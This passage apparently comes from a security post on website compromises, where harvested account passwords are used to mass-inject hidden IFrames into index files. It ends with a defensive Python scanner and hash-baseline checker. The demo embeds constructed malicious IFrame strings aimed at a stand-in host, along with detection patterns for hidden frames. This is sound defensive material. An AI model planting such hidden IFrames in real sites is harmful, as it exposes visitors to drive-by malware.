It looks like the attack usually has two stages.
• Account password harvesting. In the first stage they collect passwords for the accounts; we can call this stage "account password harvesting". Details on how they do that are fuzzy. The truth is that on a typical Linux server it might be enough to get just one user account password to be in a reasonably good position to get root via some kind of little-known or unpatched exploit. Zones and jails are better in this respect, as they protect other users from easily compromised "suckers" who happily use passwords like 123456 or use spyware-infected PCs at home. Actually the complexity of the password should be beefed up to at least 8 characters. But this does not help if the user's computer is infected with a keylogger. ISPs need to handle vastly different classes of users, and security is always only as good as the weakest link.
• In the second stage the pool of harvested passwords is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and that they use a special tool, called MPACK, to install malicious IFrames. Usually only the main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document; that might be because of different tools, or different versions or modes of operation of MPACK. But there are other cases where all documents were modified by replacing the HEAD tag
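The three placements just described (before the document opens, appended after it, or planted inside a replaced HEAD) are exactly what a hosting provider can check for. The script below is an added example, not part of the original post or of any MPACK analysis: it flags IFrames found in those positions or carrying attributes that hide them from visitors, and keeps a SHA-256 baseline of index documents so a later run reports which ones changed. The sample documents, the host names `malicious.example` and `video.example`, and the temporary document root built by `demo()` are all constructed for the example.

```python
"""Defensive scanner for the "mass modification of index files" stage.

Added example, not code from the original post. Two checks a web host can
run against a document root:
  1. flag <iframe> tags sitting where injected ones were found (before the
     first <html>/<head>, after </body>/</html>, or inside <head>) or with
     attributes that hide the frame (0/1 px, display:none, visibility:hidden);
  2. keep a SHA-256 baseline of index documents and report what changed.
Sample documents and host names below are constructed for this example.
"""
import hashlib
import re
import tempfile
from pathlib import Path

INDEX_NAMES = ("index.php", "index.html", "index.htm", "index.shtml")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
# width/height of 0 or 1 pixel, or CSS that hides the frame from the visitor
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*[=:]\s*["']?[01](?:px)?["']?(?!\d)"""
    r"""|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)
SUSPICIOUS_LOCATIONS = {"top", "tail", "head"}


def _location(html: str, start: int) -> str:
    """Classify where an <iframe> tag beginning at html[start] sits in the document."""
    low = html.lower()
    head_open, head_close = low.find("<head"), low.find("</head>")
    first_tag = min((i for i in (low.find("<!doctype"), low.find("<html"), head_open) if i >= 0),
                    default=-1)
    last_close = max(low.rfind("</body>"), low.rfind("</html>"))
    if first_tag >= 0 and start < first_tag:
        return "top"        # injected before the document even opens
    if last_close >= 0 and start >= last_close:
        return "tail"       # appended after </body> or </html>
    if 0 <= head_open < start < head_close:
        return "head"       # planted inside <head> (the "replaced HEAD tag" case)
    return "body"


def analyze(html: str) -> list:
    """Return one record per <iframe> in html, marking the suspicious ones."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        location = _location(html, m.start())
        hidden = HIDDEN_RE.search(m.group(0)) is not None
        findings.append({"tag": m.group(0), "location": location, "hidden": hidden,
                         "suspicious": hidden or location in SUSPICIOUS_LOCATIONS})
    return findings


def index_files(root: Path) -> list:
    """All main index documents under root, the files the post says were targeted."""
    return sorted(p for p in root.rglob("*") if p.is_file() and p.name.lower() in INDEX_NAMES)


def scan_webroot(root: Path) -> dict:
    """Map relative path -> suspicious iframe records for every index document."""
    report = {}
    for path in index_files(root):
        hits = [f for f in analyze(path.read_text(errors="replace")) if f["suspicious"]]
        if hits:
            report[str(path.relative_to(root))] = hits
    return report


def fingerprint(root: Path) -> dict:
    """SHA-256 per index document; store this baseline off the web server."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in index_files(root)}


def changed_since(root: Path, baseline: dict) -> list:
    """Index documents whose hash differs from the baseline, or that are new."""
    return sorted(rel for rel, digest in fingerprint(root).items() if baseline.get(rel) != digest)


# Constructed sample documents (not taken from any real compromise).
CLEAN = "<html>\n<head><title>Site</title></head>\n<body><p>Hello</p></body>\n</html>\n"
INJECT_TOP = '<iframe src="http://malicious.example/in.php" width=1 height=1 style="visibility:hidden"></iframe>\n'
INJECT_TAIL = '<iframe src="http://malicious.example/in.php" width=0 height=0 frameborder=0></iframe>'
HEAD_REPLACED = CLEAN.replace("<head>", '<head><iframe src="http://malicious.example/" style="display:none"></iframe>')
BENIGN_EMBED = CLEAN.replace("</p>", '</p><iframe src="https://video.example/embed/1" width="560" height="315"></iframe>')


def demo() -> dict:
    """Build a constructed docroot, baseline it, simulate the mass modification, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for sub in ("site1", "site2", "site3", "site4"):
            (root / sub).mkdir()
        (root / "site1" / "index.html").write_text(CLEAN)
        (root / "site2" / "index.php").write_text(CLEAN)
        (root / "site3" / "index.shtml").write_text(CLEAN)
        (root / "site4" / "index.html").write_text(BENIGN_EMBED)   # legitimate visible embed
        baseline = fingerprint(root)
        # the automated pass over the harvested accounts: three placements from the post
        (root / "site1" / "index.html").write_text(INJECT_TOP + CLEAN)
        (root / "site2" / "index.php").write_text(CLEAN + INJECT_TAIL)
        (root / "site3" / "index.shtml").write_text(HEAD_REPLACED)
        return {"changed": changed_since(root, baseline),
                "flagged": {rel: [h["location"] for h in hits] for rel, hits in scan_webroot(root).items()}}


if __name__ == "__main__":
    print(demo())
```

The position heuristic is deliberately narrow: a visible IFrame inside `<body>` with normal dimensions (the `site4` embed) is left alone, while anything outside the document skeleton or hidden from the visitor is reported. The hash baseline is the more robust of the two checks, since it catches modifications regardless of how the injected markup looks; it only works if the baseline is kept somewhere the harvested account cannot rewrite.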